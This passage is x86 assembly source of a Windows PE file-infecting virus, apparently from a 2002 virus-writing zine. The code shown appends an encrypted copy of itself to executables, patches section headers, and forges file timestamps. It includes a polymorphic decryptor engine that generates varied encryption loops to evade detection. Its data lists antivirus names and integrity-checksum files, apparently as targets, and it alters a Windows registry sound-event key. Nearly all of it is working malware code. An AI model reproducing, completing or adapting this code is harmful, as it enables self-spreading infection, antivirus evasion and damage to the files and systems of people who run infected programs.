pop esi mov edx, DataSectionEntryPtr+ebp ; If link and ds too small, mov eax, NewVirtualSizeOfData+ebp ; then make it bigger mov [edx].sec_VirtualSize, eax ; else stay the same mov edx, LastSectionEntryPtr+ebp ; Fixup Last Section Sizes mov ecx, [edi].FileAlignment mov eax, [edx].sec_SizeOfRawData mov esi, eax ; esi= size of last section add eax, VIRUSCODESIZE push eax dec ecx add eax, ecx not ecx and eax, ecx ; eax= Aligned raw size of last section mov [edx].sec_SizeOfRawData, eax pop eax ; not rounded raw size + vir size mov ecx, [edi].SectionAlignment dec ecx add eax, ecx not ecx push ecx and eax, ecx mov ecx, [edx].sec_VirtualSize ; Get old size for Image size adjust mov [edx].sec_VirtualSize, eax ; Save New Section VSize sub eax, ecx ; Get Size increase pop ecx ; get Section mask (FFFFF000 usually) and eax, ecx ; Sec Align total size increase add [edi].SizeOfImage, eax ; add it to the size ; Fix: ; - Fix Last Section Size (done above) ; - Fix Code Section Size (probably not needed) ; - Fix up GetModHandleAddy (done above) ; mov ecx, LastSectionEntryPtr+ebp mov ebx, [ecx].sec_PointerToRawData add ebx, esi ;int 3 mov eax, VIRUSCODESIZE-1 mov edi, [edi].FileAlignment add eax, edi neg edi and edi, eax call _UnmapViewOfFile+ebp ; Handle Already on stack call _CloseHandle+ebp ; Handle Already on stack pop esi ; Get File Handle push esi ; File Handle back for later xor eax, eax call _SetFilePointer+ebp, esi, ebx, eax, FILE_BEGIN lea eax, PolyedVirus+ebp lea ecx, BytesWritten+ebp ;int 3 ; call _WriteFile+ebp, esi, eax, VIRUSCODESIZE, ecx, 0 call _WriteFile+ebp, esi, eax, edi, ecx, 0 inc NumInfected+ebp lea eax, FindFile.fd_ftCreationTime+ebp lea ecx, FindFile.fd_ftLastAccessTime+ebp lea edx, FindFile.fd_ftLastWriteTime+ebp call _SetFileTime+ebp, esi, eax, ecx, edx jmp short CloseAndExitInfector UnmapAndClose: call _UnmapViewOfFile+ebp ; Handle Already on stack call _CloseHandle+ebp ; Handle Already on stack CloseAndExitInfector: call _CloseHandle+ebp ; Again on Stack ExitInfector: ret ;********************** ; Enter ; eax = RVA ; esi = Start Of Memory mapped PE file. ; Leave: ; eax = Mem map Address RVA2Addr: push ebx push edx push ecx push esi push edi movzx edi, word ptr [esi+3Ch] add edi, esi movzx edx, [edi].SizeOfOptionalHeader movzx ecx, [edi].NumberOfSections lea edx, [edi+edx+18h] ; Start of Section table mov ebx, [edx].sec_VirtualAddress mov esi, [edx].sec_PointerToRawData SectionLoop1: cmp ebx, [edx].sec_VirtualAddress jae short SkipSecLoop1 cmp eax, [edx].sec_VirtualAddress jb short SkipSecLoop1 mov ebx, [edx].sec_VirtualAddress mov esi, [edx].sec_PointerToRawData SkipSecLoop1: add edx, size SECTION loop SectionLoop1 sub eax, ebx add eax, esi pop edi pop esi add eax, esi pop ecx pop edx pop ebx ret MakeDecryptor: lea edi, PolyedVirus+ebp mov PolySizeCount+ebp, edi ; Counter for number of bytes used. mov StackRestore+ebp, esp if DEBUGENTRY mov al, 0CCh stosb endif call SelectRegs2 call CreateInitCode call MarkLoop call CreateLoad call CreateEncryption call CreateAddInECX call CreateStore call CreateLoop call CreateGotoVirus FinishedAlgorithm: mov esi, PolySizeCount+ebp sub edi, esi cmp edi, EmptyCodeSecSize+ebp ja short MakeDecryptor mov ecx, edi mov edi, EmptyCodeSecAddr+ebp push esi rep movsb pop edi lea esi, VirusStart+ebp mov ecx, VIRUSCODESIZE EncryptVirus2: lodsb call PolyEncryptPtr+ebp stosb loop EncryptVirus2 ret MakePolyError: mov esp, StackRestore+ebp jmp MakeDecryptor ; *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* ; Atom Functions ; *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* CreateZero: call randomslow test al, 11 je short CreateZeroMov or al, al js short CreateZeroSub CreateZeroXor: mov eax, edx shl eax, 11 or ax, 0C031h jmp short CreateZeroCommon CreateZeroSub: mov eax, edx shl eax, 11 or ax, 0C029h CreateZeroCommon: or ah, dl stosw ret CreateZeroMov: push ecx xor ecx, ecx call CreateMov pop ecx ret ; -------- CreateAdd: mov al, 5 cmp dl, 0 ; eax je short EntryFromCreateSub2 cmp ecx, 7Fh jbe short CreateAddSX cmp ecx, -80h jb short CreateAddNoSX CreateAddSX: mov al, 83h stosb mov al, 0C0h EntryFromCreateSub3: or al, dl stosb mov al, cl stosb ret CreateAddNoSX: mov al, 81h stosb mov al, 0C0h EntryFromCreateSub1: or al, dl EntryFromCreateSub2: stosb mov eax, ecx stosd ret ; -------- CreateSub: mov al, 2Dh cmp dl, 0 ; eax je short EntryFromCreateSub2 cmp ecx, 7Fh jbe short CreateSubSX cmp ecx, -80h jb short CreateSubNoSX CreateSubSX: mov al, 83h stosb mov al, 0E8h jmp short EntryFromCreateSub3 CreateSubNoSX: mov al, 81h stosb mov al, 0E8h jmp short EntryFromCreateSub1 ; -------- CreateMov: mov al, 0B8h jmp short EntryFromCreateSub1 ; -------- CreateInc: mov al, 40h EntryFromDec: or al, dl stosb ret ; -------- CreateDec: mov al, 48h jmp short EntryFromDec ; -------- CreatePush: mov al, 50h jmp short EntryFromDec ; -------- CreateXor8: or dl, dl je short CreateXorAL mov ax, 0F080h or ah, dl stosw jmp short CreateXor8Common CreateXorAL: mov al, 34h stosb CreateXor8Common: dec ebx dec ebx mov byte ptr [ebx], 34h EntryFromCreateAdd8: call randomfast stosb mov byte ptr [ebx+1], al ret CreateAdd8: or dl, dl je short CreateAdd8AL mov ax, 0C080h or ah, dl stosw jmp short CreateAdd8Common CreateAdd8AL: mov al, 04h stosb CreateAdd8Common: dec ebx dec ebx mov byte ptr [ebx], 2Ch jmp short EntryFromCreateAdd8 CreateRol8: sub ebx, 3 mov ax, 0C8C0h mov word ptr [ebx], ax and ah, 0F7h or ah, dl stosw RolNoGood: call randomfast and al, 7 jz RolNoGood stosb mov byte ptr [ebx+2], al ret CreateSub8: or dl, dl je short CreateSub8AL mov ax, 0E880h or ah, dl stosw jmp short CreateSub8Common CreateSub8AL: mov al, 2Ch stosb CreateSub8Common: dec ebx dec ebx mov byte ptr [ebx], 04h jmp short EntryFromCreateAdd8 ; *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* ; Mid-Level Functions ; *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* CreateMidInit: call randomslow or al,al js short CreateInitZAdd call CreateMov ret CreateInitZAdd: test al, 1 je short CreateInitSub call CreateZero call CreateAdd ret CreateInitSub: call CreateZero neg ecx call CreateSub ret ;---------- CreateMidInc: call randomslow or al,al js short CreateMidIncAdd call CreateInc ; Inc ret CreateMidIncAdd: push ecx xor ecx,ecx inc ecx test al, 1 jz short CreateMidIncSub EntryFromMidDec_Add: call CreateAdd ; Add 1 jmp short CreateMidIncDone CreateMidIncSub: ; Sub -1 neg ecx EntryFromMidDec_Sub: call CreateSub CreateMidIncDone: pop ecx ret ;---------- CreateMidDec: call randomslow or al,al js short CreateMidDecSub call CreateDec ret CreateMidDecSub: push ecx xor ecx,ecx inc ecx test al, 1 jnz short EntryFromMidDec_Sub CreateMidDecAdd: neg ecx jmp short EntryFromMidDec_Add ; *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* ; Complex Functions ; *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* CreateLoadMem: mov al, dl shl eax, 11 or ax, 008Ah or ah, cl stosw mov dl, cl call CreateMidInc ret CreateStoreMem: mov al, dl shl eax, 11 or ax, 0088h or ah, cl stosw mov dl, cl call CreateMidInc ret CreateSourceInit: mov dl, PolySourceReg+ebp mov eax, LastSectionEntryPtr+ebp mov ecx, [eax].sec_VirtualAddress add ecx, [eax].sec_SizeOfRawData add ecx, [esi].ImageBase call CreateMidInit ret CreateDestInit: mov dl, PolyDestReg+ebp mov eax, DataSectionEntryPtr+ebp mov ecx, [eax].sec_VirtualAddress add ecx, [esi].ImageBase call CreateMidInit test byte ptr PolyFlag+ebp, 1 jnz short CreateDestInitDone call CreatePush CreateDestInitDone: ret CreateCntrInit: mov dl, PolyCntrReg+ebp mov ecx, VIRUSCODESIZE call CreateMidInit ret MarkLoop: mov LoopLocation+ebp, edi ret CreateLoad: mov dl, PolyWorkReg+ebp mov cl, PolySourceReg+ebp or dl, dl jne short CreateLoadMemCall cmp cl, 6 jne short CreateLoadMemCall mov al, 0ACh stosb ret CreateLoadMemCall: call CreateLoadMem ret CreateStore: mov dl, PolyWorkReg+ebp mov cl, PolyDestReg+ebp or dl, dl jne short CreateStoreMemCall cmp cl, 7 jne short CreateStoreMemCall mov al, 0AAh stosb ret CreateStoreMemCall: call CreateStoreMem ret CreateLoop: mov dl, PolyCntrReg+ebp mov al, 0E2h cmp dl, 1 je short MakeLoopCommon LoopNotECX: call CreateMidDec mov al, 75h MakeLoopCommon: stosb mov eax, LoopLocation+ebp sub eax, edi dec eax stosb cmp eax, -80h jb MakePolyError ret CreateGotoVirus: test byte ptr PolyFlag+ebp, 1 jz short CreateGotoVirusRet mov al, 0E9h stosb mov eax, DataSectionEntryPtr+ebp mov eax, [eax].sec_VirtualAddress mov ecx, EmptyCodeSecRVA+ebp sub eax, ecx mov ecx, edi sub ecx, PolySizeCount+ebp add ecx, 4 sub eax, ecx stosd ret CreateGotoVirusRet: mov al, 0C3h stosb ret InstructInitTable: dd offset CreateSourceInit dd offset CreateDestInit dd offset CreateCntrInit CreateInitCode: xor ecx, ecx CreateInitLoop: call randomslow and eax, 3 jz short CreateInitLoop dec eax bts ecx, eax jc short CreateInitLoop mov eax, [ebp+4*eax+offset InstructInitTable] add eax, ebp push ecx call eax pop ecx cmp cl, 7 jne short CreateInitLoop ret SelectRegs2: call randomslow mov PolyFlag+ebp, al mov dl, 00110000b GetWork2: call randomfast or al, al js short PickRandWork2 test dl, 1 jnz short PickRandWork2 mov byte ptr PolyWorkReg+ebp, 0 or dl, 1 jmp short GetSource2 PickRandWork2: call GetFreeRegister8 mov PolyWorkReg+ebp, al GetSource2: call randomfast or al, al js short PickRandSource2 test dl, 40h jnz short PickRandSource2 mov byte ptr PolySourceReg+ebp, 6 or dl, 40h jmp short GetCntr2 PickRandSource2: call GetFreeRegister mov PolySourceReg+ebp, al GetCntr2: call randomfast or al, al js short PickRandCntr2 test dl, 2 jnz short PickRandCntr2 mov byte ptr PolyCntrReg+ebp, 1 or dl, 2 jmp short GetDest2 PickRandCntr2: call GetFreeRegister mov PolyCntrReg+ebp, al GetDest2: call randomfast or al, al js short PickRandDest2 test dl, 80h jnz short PickRandDest2 mov byte ptr PolyDestReg+ebp, 7 or dl, 80h jmp short SelectRegsDone2 PickRandDest2: call GetFreeRegister mov PolyDestReg+ebp, al SelectRegsDone2: ret CreateAddInECX: test byte ptr PolyFlag+ebp, 2 jnz short SelectRegsDone2 mov al, PolyCntrReg+ebp cmp al, 4 jae short SelectRegsDone2 shl eax, 11 or ax, 0C000h or ah, PolyWorkReg+ebp stosw mov ecx, PolyEncryptPtr+ebp dec ecx dec ecx mov ax, 0C828h mov word ptr [ecx], ax mov PolyEncryptPtr+ebp, ecx ret GetFreeRegister8: call randomfast and al, 7 mov ah, 1 xchg ecx, eax test cl, 4 jnz short UpperRegister8 rol ch, cl GetReg8Common: xchg ecx, eax test dl, ah jnz GetFreeRegister8 or dl, ah ret UpperRegister8: and cl, 3 rol ch, cl or cl, 4 jmp GetReg8Common GetFreeRegister: call randomfast and eax, 7 bts edx, eax jc GetFreeRegister ret EncryptOpTable: dd offset CreateXor8 dd offset CreateAdd8 dd offset CreateRol8 dd offset CreateSub8 db 45 dup (?) ; Hold encryption code. OpcodeStack: ret CreateEncryption: mov byte ptr OpcodeFlag+ebp, 0 lea ebx, OpcodeStack+ebp call randomslow xchg eax, ecx and ecx, 7 inc ecx MakeEncryptOps: call randomslow and eax, 03h cmp OpcodeFlag+ebp, al je short MakeEncryptOps mov OpcodeFlag+ebp, al mov eax, [ebp+4*eax+offset EncryptOpTable] add eax, ebp mov dl, PolyWorkReg+ebp call eax loop MakeEncryptOps mov PolyEncryptPtr+ebp, ebx ret ; -***********************************- ; Psuedo Random Number Generator ; -***********************************- randomslow: if DEBUG jmp short randomfast endif push edi lea edi, CurrentTime.ft_dwHighDateTime+ebp call RandomCommon pop edi ret randomfast: push edi lea edi, CurrentTime.ft_dwLowDateTime+ebp call RandomCommon pop edi push ecx push edx mov ecx, eax jmp short RandPentiumExt RandReturn: pop edx pop ecx ret RandPentiumExt: db 0Fh, 31h ; rdtsc instruction (possible exceptn) jmp $+2 ; should add SEH handler, xor eax, ecx ; but I just don't care anymore jmp short RandReturn RandomCommon: push ecx push edx push ebx mov eax, dword ptr [edi] cdq mov ecx, 44488 idiv ecx push edx mov ecx, 3399 mul ecx xchg eax, ebx pop eax mov ecx, 48271 mul ecx sub eax, ebx stosd jnl short RandTooLow add eax, 7FFFFFFFh RandTooLow: dec eax pop ebx pop edx pop ecx ret ; ; esi = Function names ; edi = address destination ; ebx = handle of Lib ; ; returns: ; carry flag clear if ok, set if error FillImports: lodsb movzx ecx, al jecxz FillImpDone push esi add esi, ecx call _GetProcAddress+ebp, ebx or eax,eax jz short FillImpFail stosd jmp short FillImports FillImpDone: clc ret FillImpFail: stc ret include adecode.asi ; -==============================- ; Initialized Data ; -==============================- if DEBUGROOTDIR RootDir db 'GOATS',0 else RootDir dd '\',0 endif FileMaskAny db '*.*',0 FileMaskExe db '*.EXE',0 nKernel32 db 'KERNEL32',0 nExitProcess db 'ExitProcess',0 nGetModuleHandle db 'GetModuleHandleA',0 AVNames db 3,'AVP' db 4,'SCAN' db 6,'FINDVI' db 2,'F-',0 CRCNames db 13,'ANTI-VIR.DAT',0 db 11,'CHKLIST.MS',0 db 8,'AVP.CRC',0 db 8,'IVB.NTZ',0 db 0 nGetProcAddr db 'GetProcAddress',0 InfFunctions: db 12,'CreateFileA',0 db 19,'CreateFileMappingA',0 db 14,'MapViewOfFile',0 db 16,'UnmapViewOfFile',0 db 12,'CloseHandle',0 db 15,'SetFilePointer',0 db 10,'WriteFile',0 db 24,'GetSystemTimeAsFileTime',0 db 21,'GetCurrentDirectoryA',0 db 21,'SetCurrentDirectoryA',0 db 15,'FindFirstFileA',0 db 14,'FindNextFileA',0 db 10,'FindClose',0 db 19,'SetFileAttributesA',0 db 12,'SetFileTime',0 db 12,'ExitProcess',0 db 12,'DeleteFileA',0 db 21,'GetWindowsDirectoryA',0 db 13,'LoadLibraryA',0 db 12,'FreeLibrary',0 db 0 BakaWav: include baka.bin bakafile db '\baka.wav',0 RegKey db '.DEFAULT\AppEvents\Schemes\Apps\.Default\AppGPFault\.Current',0 RegFunctions: db 12,'RegOpenKeyA',0 db 12,'RegCloseKey',0 db 13,'RegSetValueA',0 db 0 VirusInitEnd: _GetProcAddress dd ? InfDest: ; Have to be in Same order as above _CreateFileA dd ? _CreateFileMappingA dd ? _MapViewOfFile dd ? _UnmapViewOfFile dd ? _CloseHandle dd ? _SetFilePointer dd ? _WriteFile dd ? _GetSystemTimeAsFileTime dd ? _GetCurrentDirectoryA dd ? _SetCurrentDirectoryA dd ? _FindFirstFileA dd ? _FindNextFileA dd ? _FindClose dd ? _SetFileAttributesA dd ? _SetFileTime dd ? _ExitProcess dd ? _DeleteFileA dd ? _GetWindowsDirectoryA dd ? _LoadLibraryA dd ? _FreeLibrary dd ? RegFuncDest: _RegOpenKeyA dd ? _RegCloseKey dd ? _RegSetValueA dd ? SFCLib dd ? _SfcIsFileProtected dd ? SearchHnd dd ? RegHnd dd ? NumOfNames dd ? ExitProcessRVA dd ? GetModuleHandleRVA dd ? NewVirtualSizeOfData dd ? EmptyCodeSecRVA dd ? EmptyCodeSecAddr dd ? EmptyCodeSecSize dd ? LastSectionEntryPtr dd ? DataSectionEntryPtr dd ? BytesWritten dd ? FoundExitCall dd ? ExeGoodCount dd ? ExeBadCount dd ? NonExeCount dd ? ExeSizesPtr dd ? DirCount dd ? LetterCount db ? LastLetter db ? NumInfected db ? AVCRCFlag db ? ; Regs ok are: 0-3,6,7 (eax, ecx, edx, ebx, esi, edi) PolyFlag db ? PolySizeCount dd ? LoopLocation dd ? PolyEncryptPtr dd ? StackRestore dd ? PolySourceReg db ? PolyDestReg db ? PolyCntrReg db ? PolyWorkReg db ? OpcodeFlag db ? DirBuf db 256 dup (?) CurrentTime FILETIME ? FindFile WIN32_FIND_DATA <?> ExeSizes dd MAXEXEPERDIR dup (?) buffer db (MAX_PATH+10) dup (?) PolyedVirus db VIRUSCODESIZE dup (?) VirusEnd: end HOST COMMENT ` ---------------------------------------------------------------- )=- -=( Natural Selection Issue #1 --------------- (c) 2002 Feathered Serpents )=- -=( ---------------------------------------------------------------------- ) `